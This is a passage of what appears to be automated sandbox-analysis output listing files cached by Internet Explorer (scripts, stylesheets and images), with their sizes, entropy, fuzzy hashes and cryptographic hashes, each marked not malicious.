                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21717
                                                                                                                                                                                                                              Entropy (8bit):5.305602492520896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
                                                                                                                                                                                                                              MD5:677C48207F5A13E6D6DADF30D2D6C52B
                                                                                                                                                                                                                              SHA1:10BCE9871F228CA247E92B0A6366D5FE2A4426C8
                                                                                                                                                                                                                              SHA-256:16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
                                                                                                                                                                                                                              SHA-512:7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\nrrV52461[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91348
                                                                                                                                                                                                                              Entropy (8bit):5.423638505240867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:uEuukXGs7ui3gn7qeOdillEx5Q3YzuCp9oZuvby3TdXPH6viqQDnjs2i:aKiw0di378uQMfHgjV
                                                                                                                                                                                                                              MD5:9C4A60B2332E94D3BFF324BD8DF61A31
                                                                                                                                                                                                                              SHA1:6245D60C273E175D3EC798CE8ABB65AD75F24E09
                                                                                                                                                                                                                              SHA-256:8C38115211EB4E291CE6F38629C8AEE0F882EBED06B66F3DB3D6587C1EBDF52F
                                                                                                                                                                                                                              SHA-512:31830D8DE79206C5C5B178DBC798D3A2AF597BA14D9075EE25CC82B096083B180B0B41CB5DC24640AC2A8329575102A3D724DA1F4307DDFB57DBC5C64A873817
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\otBannerSdk[2].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):325178
                                                                                                                                                                                                                              Entropy (8bit):5.3450457320873355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:7Kk89fToixHtGt3mBC4VcW3fUAbJ7Kz0yzGO:acixHMPzfJ
                                                                                                                                                                                                                              MD5:56B5E93BFB078B9EEF2BA41DB521EA9B
                                                                                                                                                                                                                              SHA1:A61A4949BCBCA6B8148CC6821D7CF88FBD90062F
                                                                                                                                                                                                                              SHA-256:B8603101616C7960752244D2EC66D2A845BBE0094B83E7CC2877880A3A93402D
                                                                                                                                                                                                                              SHA-512:C10E26F5C9B66E1FA82926AD43C7C70EDF00D3BEBE376DA674B325FB34EDB47EDF490BF84457BBC085BBFA1AF37D92F20067AA46B1334D623D2AE80B66810C02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):251398
                                                                                                                                                                                                                              Entropy (8bit):5.2940351809352855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                                                                                                                                                                                                              MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                                                                                                                                                                                                              SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                                                                                                                                                                                                              SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                                                                                                                                                                                                              SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\52-478955-68ddb2ab[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):397554
                                                                                                                                                                                                                              Entropy (8bit):5.324293513672579
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:YXP9M/wSg/Ms1JuKb4K7hmnidfWPqIjHSjaTCr1BgxO0DkV4FcjtIuNK:CW/ycnidfWPqIjHdO16tbcjut
                                                                                                                                                                                                                              MD5:E0EE2633FE41EB7DDC1CAE8022DFB4D2
                                                                                                                                                                                                                              SHA1:943A97B03F6B3BE7053CB2EDE05E1E19839B3790
                                                                                                                                                                                                                              SHA-256:9B752E3E13C79007FC41FE147485990CED773DDEEE63D7409CC5DEB45062393F
                                                                                                                                                                                                                              SHA-512:22994B9288054B22B49A9D439F5DF7A4DBA4507DCA56F20BF222113AA60544E374DEF9FCBCB214DF0684DA68A3550898CCB5B47EAA57C20FCC52BDC735653EF4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQCmUS[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31947
                                                                                                                                                                                                                              Entropy (8bit):7.892422553435186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:IaBjbh6TFQqvZ54il2R40NXypZfdvRB+6KCOfH:IaBXOQqX4igl4zZRB+ffH
                                                                                                                                                                                                                              MD5:62A8482CFB648DD0D95E83D2B22FAE7A
                                                                                                                                                                                                                              SHA1:D6F0CD6A1834A60F4C5994067CED244E2E921FA8
                                                                                                                                                                                                                              SHA-256:8361D066356EB990AF5B6D5E6A77225982A6B40D3BCA809274FD3FB40F6FD92D
                                                                                                                                                                                                                              SHA-512:A6834B4CA196B46432AA31C5A5F0EC16E41852C2A2D7D09C3374CC942795DC4A0A958C7DC72DA6FFFB6A437462AF67C75FC01FFABFC9565A7EACB0C9F9DE2CB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQQSrK[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11692
                                                                                                                                                                                                                              Entropy (8bit):7.94273146239602
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QoIjrMQW4oH2FsVg+A0nZJNQeO7QD6jzBWVvEvosc/p43G7pVBkVUmLm07ksmWmB:bIjrMQfo0oxA0ZweOUpvsOy2/qVUmLml
                                                                                                                                                                                                                              MD5:20D4519FB505B36BE4DE67E3263C1413
                                                                                                                                                                                                                              SHA1:A73956576096046A20F059FE6A4C2AB07BD3E27D
                                                                                                                                                                                                                              SHA-256:43EB91494B152806DF501FFE317ACFEC63B085CA16FBC379B0EE49023581CD77
                                                                                                                                                                                                                              SHA-512:AC69E84B8C6B86C7866BB7FCA01ED9EA0B67352682AB2FD6A6DD8707120CAE4263E284731DAE0F76785B5211C4E48B324ECB9BE75AA0294B2F0A9FF8C679588F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQTQg3[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16552
                                                                                                                                                                                                                              Entropy (8bit):7.962704167525703
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:bwUOEG07947y6MuqZ3a0hLx8cWlHLSLJI1sz5G1i3KmthC:bwex47nMuCVH/WlaJfMi3KmthC
                                                                                                                                                                                                                              MD5:30C5DFAB992D12D27C5FF58B3CD3B81D
                                                                                                                                                                                                                              SHA1:F19657FA21E005441FAEAE1D107C8D2203593C5D
                                                                                                                                                                                                                              SHA-256:EB2BBF30F0A20C1D2F1B5C96A9D7DF32115F7ABD4E68374DF2A0B996ABB0C23E
                                                                                                                                                                                                                              SHA-512:EC89E47D9C49DB7B5E8E5388A29C5F1C5424C0293DC972D9878A332C58A0174F083BACAC07574A761844E5CD6A2E33BF4648B92DB7494129DDA4CC11FEBDAAC8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWMEO[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11822
                                                                                                                                                                                                                              Entropy (8bit):7.8289572737659165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Q2X49PzpHHPI+EfUJt4d2RssaboN5VRbxYi7wJmGok4qc1/CYtK2ebMPJ:NX4RFPI9dqZlq+wJuIesRAh
                                                                                                                                                                                                                              MD5:635D2E812B29FE98B0D2159D0ABE2453
                                                                                                                                                                                                                              SHA1:963026C35E7C7FFFB0F0C052F2E91BF6F15DA195
                                                                                                                                                                                                                              SHA-256:5243A76E4EAF7EF8A5D4C72FDD3BA4E48FC7875B986BCE757C146C24FF6C4E72
                                                                                                                                                                                                                              SHA-512:FC6CE7BD1169FBEA0AF45E03AE564AAFDEC51DA7914BE7FA9CC8104E841ECFE9A08340D1A978FAC6D783A4CB41EA66B1248157215D143E279A1C6E8809D0FCE3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWN27[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20084
                                                                                                                                                                                                                              Entropy (8bit):7.952135561729653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NkutMulvimxLMdBGbDRbtuDg2Kqz99Jo62163cXjdyPjjydXA+LYOj9brbd+jyXw:NkutMy6mxLeUNtuMABf/CgczGfyxA+LW
                                                                                                                                                                                                                              MD5:0F85A59AFD921E06E739234EBBFCFF7F
                                                                                                                                                                                                                              SHA1:0A081F5CDA7224A219E97E6668FE5C079F473F3D
                                                                                                                                                                                                                              SHA-256:86F91238B0C5BA5D297E3C58835DA37D58A00FA218D75FC1FB9B482CD75A2CE8
                                                                                                                                                                                                                              SHA-512:E8E1C93F9114DFF133A8CCA08D8FA10870E7550193377C4A069EBF625B4803FBA6121563B5470FDA5498BF3E96ECD52C02354D2B1002CD0F3D115261EA1ABF7B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWZ1M[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11524
                                                                                                                                                                                                                              Entropy (8bit):7.853199656109683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Q255QcmmWT3NeMr8Su3KTBwYP5HTHnSyRzaHbxzdFlyUi2JmJwRd2bxUdgRhCyq:N55QWWxFoXPYFH3ROBpyUiAuYdixUgR+
                                                                                                                                                                                                                              MD5:184A58668CF5B11BACAA18CA15D4B08D
                                                                                                                                                                                                                              SHA1:F5F9515D2792A83933D3A781A0282791005D3A90
                                                                                                                                                                                                                              SHA-256:5C71A4888CFD8F6E5A2422852B21D7E3BBEEDDEF6656C9B7FCFBAA7DAE35C3BF
                                                                                                                                                                                                                              SHA-512:33CC28FA94C100216D061D01E4379AD5E60C05CA99E3E4A9AC4788831E96A4EBC84792D1096180A4C9C60A54E5514E801F6796FF63441B239930E9C5D3834CEE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWeGa[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12503
                                                                                                                                                                                                                              Entropy (8bit):7.861125255017763
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NOxz4RTFHGSd1PGyjC1qJvd/ernz9Bc+ACiUhb:NIz6TFmEGyEqvozJz
                                                                                                                                                                                                                              MD5:593272E4883F05B819B99C6A4E27E320
                                                                                                                                                                                                                              SHA1:7C0EAA8D680B0BD013F4215A9AED0BBBAB732ED7
                                                                                                                                                                                                                              SHA-256:EEF26258D6D8B72752EC7D53B19DB2078F133898614EFFD4496620582E5A507D
                                                                                                                                                                                                                              SHA-512:37AAEA107ABDEF120CD2C6230B7EA207A3FD7EC109006EDC8ACA0B5580E062E67DA22EC8B5F413F319B743BF1A967AA66FD5A76E3D9E077CE407B052D5D8EE7C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQXgGS[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7672
                                                                                                                                                                                                                              Entropy (8bit):7.899724287113537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QoHqdeF0SalNmFwy9VM0IbyMp7GTFbXcF3zH:bHdF0SeNny9KWM1G5bgDH
                                                                                                                                                                                                                              MD5:BBB780E441A64C9C3E02355A7E40B10F
                                                                                                                                                                                                                              SHA1:994374DF769B6C987EED7D8A66CE2871F29B064E
                                                                                                                                                                                                                              SHA-256:869D76A392E2C5496B20C1B256CFC23E26FC0F6B58B0025BC98ABD86DF29040F
                                                                                                                                                                                                                              SHA-512:ED2CE8A2A2BE163EBDA4A745901AB8F695DB0391FA4DE1FA7710914BAE676DFAB66D710863B5D14507927FCA720B6787F6315F199ADD122BFFA77C0E01336D92
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQXqYx[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33189
                                                                                                                                                                                                                              Entropy (8bit):7.9490548374961
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:IBeUnZEbQqvWzovQqABKM2KC0ODo7QZjZs9QsHPH6q3gmDNyzqBHj:IBTnWbbOzovQXKZKBOD6RPGm5
                                                                                                                                                                                                                              MD5:24B9CB95258C67508D049AD4C96763A7
                                                                                                                                                                                                                              SHA1:1545F2FDEF85CECF7C4415A167D8EE0343B770D3
                                                                                                                                                                                                                              SHA-256:49C4D4C97D5F9B910C5E60B7532B3C1C7F867D3AE39C2A2C9C99ABA85CF5C34B
                                                                                                                                                                                                                              SHA-512:3071ECFEDB1E35D49AAD1174C3B13DC1EBB4DBFD38EB1B3165624A47F9ABC850976D2BF5F71631F0C44F2108DCE5FEA99D210CBAFAA6677F9C4A1C2CA885D66A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAycUpK[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                              Entropy (8bit):6.585816958592039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahm1TutaSP91hccpL3fHL5FlzNua5GVp:6v/7XSxFQcZ3f9rUa07
                                                                                                                                                                                                                              MD5:D63AE2349294868B3EC2658627995955
                                                                                                                                                                                                                              SHA1:E96A4ECB7E48AAC4355BDC28F12DA4C334AD2E20
                                                                                                                                                                                                                              SHA-256:12D743416FD1041E0D34C45732DD577A39CD218B65E3F39BF43F2277EE7E6553
                                                                                                                                                                                                                              SHA-512:4885F0BA41A6B9E0B14F588B6451C83B08ED2094247EE2160EAD9FB79D9A6474B7EF4DFFCA468845BD9DB27A66231833A9F94E62961975C55B12F3ACB9399C1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1aXBV1[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1161
                                                                                                                                                                                                                              Entropy (8bit):7.80841974432226
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                                                                                                                                                                                              MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                                                                                                                                                                                              SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                                                                                                                                                                                              SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                                                                                                                                                                                              SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1cEP3G[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1088
                                                                                                                                                                                                                              Entropy (8bit):7.81915680849984
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                                                                                                                                                                                              MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                                                                                                                                                                                              SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                                                                                                                                                                                              SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                                                                                                                                                                                              SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1cG73h[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1131
                                                                                                                                                                                                                              Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                                                                                                                                                                                              MD5:D1495662336B0F1575134D32AF5D670A
                                                                                                                                                                                                                              SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                                                                                                                                                                                              SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                                                                                                                                                                                              SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1kc8s[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):893
                                                                                                                                                                                                                              Entropy (8bit):7.702979580339968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
                                                                                                                                                                                                                              MD5:CD8DFD7D16B4BA3E2873EE06DB780B06
                                                                                                                                                                                                                              SHA1:E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
                                                                                                                                                                                                                              SHA-256:88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
                                                                                                                                                                                                                              SHA-512:199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB7gRE[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):501
                                                                                                                                                                                                                              Entropy (8bit):7.3374462687222906
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                                                                                                                                                                                              MD5:1FCA95AEED29D3219D0A53A78A041312
                                                                                                                                                                                                                              SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                                                                                                                                                                                              SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                                                                                                                                                                                              SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBJBnUn[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):288
                                                                                                                                                                                                                              Entropy (8bit):6.883940047874842
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmrkNuv8Xwq370je5T6ORszPbNCAx3/aEzXWw1jXjp:6v/7AuAnWepDRAPbQbY19
                                                                                                                                                                                                                              MD5:86A74BC81B7844BF0A8B8586BD73F627
                                                                                                                                                                                                                              SHA1:E4B3D38AE8F307C04A70DF41EA2808E83BD45693
                                                                                                                                                                                                                              SHA-256:CD3FA7C44EFCC76E00BC8E64C6E3C1611D687CE868902009C02FC9E6E3E5800B
                                                                                                                                                                                                                              SHA-512:DB476A14E9EB449EBF7DDC5C24A639A997BA5FF99226CE983CF68C9B6B624ACE714CC17F9A808708E62C9C4FE080B38EF42F129C565D5B705D3E15C351BEE73D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBPfCZL[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2313
                                                                                                                                                                                                                              Entropy (8bit):7.594679301225926
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                                                              MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                                                              SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                                                              SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                                                              SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBX2afX[2].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                              Entropy (8bit):7.684764008510229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                                                                                                                                                                                                              MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                                                                                                                                                                                                              SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                                                                                                                                                                                                              SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                                                                                                                                                                                                              SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\a8a064[1].gif
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16360
                                                                                                                                                                                                                              Entropy (8bit):7.019403238999426
                                                                                                                                                                                                                              Encrypted:false
